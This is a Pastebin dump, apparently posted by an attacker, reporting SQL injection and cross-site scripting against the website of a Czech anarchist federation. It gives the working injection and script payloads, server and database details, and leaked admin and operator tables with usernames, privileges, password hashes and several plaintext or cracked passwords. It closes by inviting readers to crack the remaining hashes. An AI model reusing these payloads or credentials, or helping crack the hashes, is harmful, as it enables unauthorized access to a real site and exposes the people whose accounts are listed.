Advertisement
sroub3k

csaf.cz

Feb 2nd, 2012
425
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.19 KB | None | 0 0
  1. /\ \ /\ \ /\ \ /\ \
  2. /::\ \ /::\ \ /::\ \ /::\ \
  3. /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \
  4. /:/ \:\ \ _\:\~\ \ \ /::\~\:\ \ /::\~\:\ \
  5. /:/__/ \:\__\ /\ \:\ \ \__\ /:/\:\ \:\__\ /:/\:\ \:\__\
  6. \:\ \ \/__/ \:\ \:\ \/__/ \/__\:\/:/ / \/__\:\ \/__/
  7. \:\ \ \:\ \:\__\ \::/ / \:\__\
  8. \:\ \ \:\/:/ / /:/ / \/__/
  9. \:\__\ \::/ / /:/ /
  10. \/__/ \/__/ \/__/
  11. *- Československá anarchistická federace -*
  12.  
  13. ||| Boolean Based SQL Injection
  14.  
  15. Severity: Critical
  16. Confirmation: Confirmed
  17. URL : http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
  18. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  19. Parameter Name: teor_cl
  20. Parameter Type: Querystring
  21. Attack Pattern: -1 OR 17-7=10
  22.  
  23. ||| Cross-site Scripting
  24.  
  25. Severity: Important
  26. Confirmation: Confirmed
  27. URL: http://www.csaf.cz/rss_adresa.php?'"--></style></script><script>alert(0x0006E3)</script>
  28. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  29. Parameter Name: Query Based
  30. Parameter Type: FullQueryString
  31. Attack Pattern: '"--></style></script><script>alert(0x0006E3)</script>
  32.  
  33. ||| [Possible] PHP Source Code Disclosure
  34.  
  35. Severity: Medium
  36. Confirmation: Confirmed
  37. URL: http://www.csaf.cz/obrazky/MD4-log-584jpg
  38. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  39.  
  40. ||| Info db
  41.  
  42. Target: http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
  43. Web Server: Apache/2.2.16 (Debian)
  44. Powered-by: PHP/5.3.21-1~dotdeb.0
  45. DB Server: MySQL
  46. Resp. Time(avg): 6703 ms
  47. Current User: csaf@localhost
  48. Sql Version: 5.1.58-1~dotdeb.1
  49. Current DB: csaf
  50. System User: csaf@localhost
  51. Host Name: csaf.cz
  52. Installation dir: /usr/
  53. DB User: 'csaf'@'localhost'
  54. Data Bases: information_schema, csaf
  55.  
  56. |||
  57.  
  58. csaf.phpadmin is 2
  59.  
  60. login=csaf
  61. heslo=56813b460515ecb8 / stepik
  62.  
  63. login=sstevko
  64. heslo=0d33a3ae54d3b59e / otpor
  65.  
  66. |||
  67.  
  68. csaf.admin is 1
  69. Data Found: login=lenka
  70. Data Found: heslo_new=e5a56cf0818d464cef1103f39babf57d
  71.  
  72. |||
  73.  
  74. csaf.Operatori is 12
  75.  
  76. jmeno=-fk-
  77. heslo=2074516a7196a34df7a05e7f4c157ac9
  78. aktivni=1
  79. operatori_id=pedestre
  80. help=0
  81. prava=:fsechna:
  82.  
  83. jmeno=-ll-
  84. heslo=2b8e6d0e60ae7da93e4fe214d2781f2e
  85. aktivni=0
  86. operatori_id=gaston
  87. kontakt=
  88. help=1
  89. prava=:distro_cz:
  90.  
  91. jmeno=[e]
  92. heslo=81174b6e3e394a23d91028074a067a98
  93. aktivni=1
  94. operatori_id=egil
  95. kontakt=
  96. help=1
  97. prava=:edit:edit_cizi:
  98.  
  99. jmeno=dsa
  100. heslo=8fd0cd9c7a4456b25f1dc344add6d7e4
  101. aktivni=0
  102. operatori_id=testerek
  103. kontakt=
  104. help=1
  105. prava=:edit:edit_cizi:distro_cz:pokrocile:doc:linky:
  106.  
  107. jmeno=gege
  108. heslo=2846f194dd0235954bb9ddb6af53f0c8
  109. aktivni=0
  110. operatori_id=druhy_tester
  111. help=1
  112. prava=:
  113.  
  114. jmeno=Kovac
  115. heslo=18df8b4a321e13de1590f52cab122220
  116. aktivni=0
  117. operatori_id=kovac
  118. kontakt=
  119. help=1
  120. prava=:edit:edit_cizi:distro_cz:doc:linky:
  121.  
  122. jmeno=Krystufek
  123. heslo=3fc9acc73318b183e643b765d2f9404c
  124. aktivni=0
  125. operatori_id=krystufek
  126. kontakt=
  127. help=1
  128. prava=:edit:edit_cizi:linky:
  129.  
  130. jmeno=O.H.
  131. heslo=3f7c4756e067384eb19e87dcff2baec9
  132. aktivni=1
  133. operatori_id=stanislav.rubes
  134. help=1
  135. prava=:edit:edit_cizi:distro_cz:pokrocile:doc:linky:
  136.  
  137. jmeno=Ond?ej
  138. heslo=bf0f350c72874e8c10eab29603c6eb3f
  139. aktivni=0
  140. operatori_id=honza
  141. kontakt=
  142. help=1
  143. prava=:distro_cz:
  144.  
  145. jmeno=Tar
  146. heslo=25f09991694a8149d44d708c510c99c1
  147. aktivni=0
  148. operatori_id=roza
  149. kontakt=
  150. help=0
  151. prava=:edit:distro_cz:linky:
  152.  
  153. jmeno=xmstislavx
  154. heslo=c7287236dc984656f0598070ea69b3b4
  155. aktivni=0
  156. operatori_id=mstislav
  157. help=1
  158. prava=:edit:
  159.  
  160. jmeno=xsvatoplukx
  161. heslo=73bcaaa458bff0d27989ed331b68b64d
  162. aktivni=1
  163. operatori_id=svatopluk
  164. help=1
  165. prava=:edit:edit_cizi:distro_cz:
  166.  
  167. |||
  168.  
  169. 3f7c4756e067384eb19e87dcff2baec9 is 852456
  170. 73bcaaa458bff0d27989ed331b68b64d is iddqd
  171. 18df8b4a321e13de1590f52cab122220 is jo98ska
  172.  
  173. In the next decoding md5 strings can anyone continue :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement